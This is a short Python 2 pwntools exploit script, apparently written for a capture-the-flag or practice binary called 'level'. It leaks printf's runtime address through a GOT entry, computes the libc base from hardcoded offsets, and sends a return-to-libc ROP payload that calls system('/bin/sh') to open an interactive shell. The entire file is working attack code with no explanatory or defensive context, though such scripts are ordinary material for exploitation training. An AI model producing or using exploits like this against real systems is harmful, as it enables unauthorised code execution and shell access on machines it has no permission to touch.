#!/usr/bin/env python2

from pwn import *

target = process("./level")

printf_got_entry_addr = 0x0000000000601020
target.send(p64(printf_got_entry_addr))

target.readuntil("you go: ")
printf_addr = int(target.readline().strip())

print "printf located at: ", hex(printf_addr)

#for vm -- be sure to find offsets for your machine
offset_system = 0x00000000000410b0
offset_str_bin_sh = 0x16a153
offset_printf = 0x00000000000514b0
offset_gadget1 = 0x000000000001fe4a 

libc_base = printf_addr-offset_printf

buffor = "A"*(1+8)+p64(libc_base+offset_gadget1)+p64(libc_base+offset_str_bin_sh)+p64(libc_base+offset_system)

#target.interactive()
#target.clean()
target.sendline(str(len(buffor)))
target.send(buffor)
target.interactive()
